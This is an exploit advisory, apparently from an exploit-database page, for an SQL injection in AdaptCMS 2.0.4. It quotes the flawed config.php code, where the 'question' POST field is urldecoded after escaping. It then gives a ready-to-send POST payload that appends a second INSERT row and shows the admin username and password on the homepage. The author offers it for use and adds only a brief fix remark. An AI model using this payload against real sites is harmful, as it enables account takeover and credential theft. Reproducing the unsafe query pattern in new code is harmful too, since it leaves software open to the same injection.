# Exploit Title: AdaptCMS <= 2.0.4 SQL Injection vulnerability # Date: 26/10/2012 # Exploit Author: Kallimero # Vendor Homepage: http://www.adaptcms.com/ # Software Link: http://www.insanevisions.com/page/3/Downloads/ # Version: 2.0.4 # Tested on: Debian Introduction ============ As you know, I love fun and tricky SQL injections. AdaptCMS is vulnerable to a really unusual one. The vuln ======== First let's see the code : ---------------[config.php]--------------- Line 34 : array_map('clean', $_POST); ---------------[config.php]--------------- clean() acts like addslashes. But a couple of lines after: ---------------[config.php]--------------- ligne 111: mysql_query("INSERT INTO ".$pre."polls VALUES (null, '".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '', '".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')"); ---------------[config.php]--------------- w00t an SQL injection. $_POST['question'] is urldecoded after the superglobal's clean. That's why we can easily inject our SQL request. (Without ENT_QUOTES, the simple quote pass through htmlentities() ). The PoC : ========= Ok, now we have to add a second INSERT query, to insert a custom choice in the poll, which obviously contain the admin creditentials. A simple POST http request such as: article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648 )-- - Now check homepage, and enjoy the admin creditentials. How to Fix ? ============ There is many SQL injections in this CMS ($_SERVER vars are vulnerables as well), and others funkies vulnz. changing your cms seems appropriate until they fix thoses issues. Thanks ========= All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s. Please visit : http://www.orgasm.re/Брой прочитания на тази страница: 1150
AdaptCMS 2.0.4 (config.php, question parameter) SQL Injection Vulnerability